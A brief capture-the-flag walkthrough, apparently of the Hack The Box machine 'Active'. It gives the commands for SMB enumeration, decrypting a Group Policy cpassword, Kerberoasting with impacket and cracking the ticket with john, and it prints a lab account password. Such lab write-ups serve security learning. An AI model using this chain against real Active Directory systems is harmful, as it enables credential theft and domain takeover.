Scanning
Let’s scan target ip using nmap below command
sudo nmap -p- -sV -A 10.10.10.100 
And we found lot of open port.
Enumeration
Let’s start Enumerating them one by one, I started with samba ports using smbmap tool
smbmap -H 10.10.10.100
We found a share Replication which had Read Only Permission
Let’s try accessing this share using smbclient via anonymous user.
This share contain a directory name active.htb and this directory had more directories and files. I tried listing them all using recurse on method.
smb: \> recuse on
smb: \> ls
i tried downloading whole active.htb content inside my local system using below command
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *and it download whole active.htb and it’s inside files and directories in our system
Here i found a file name Groups.xml which contain svc-tgs user hash
After researching little bit about a cpassword i found this page: https://www.linkedin.com/pulse/what-heck-cpassword-phil-vanmeerhaeghe
And using gpp-decrypt tool i decrypted this hash
gpp-decrypt <hash_here>
Let’s use these credentials after logging in with smbclient we found user.txt
smbclient //10.10.10.100/Users --user SVC_TGS --password GPPstillStandingStrong2k18 
Using get i downloaded this file :)
Privilege Escalation via Kerberoasting
Let’s find and request Service Principal Names (SPNs) associated with service accounts.
impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -outputfile spn_dataand we found administrator TGS ticket
using john i crack this hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtand we successfully cracked this hash
using smbclient with administrator user and found password we are able to access Administrator user shares
now we can find our last flag i.e. root.txt inside Administrator/Desktop/
Active Machine Solved Successfully!!
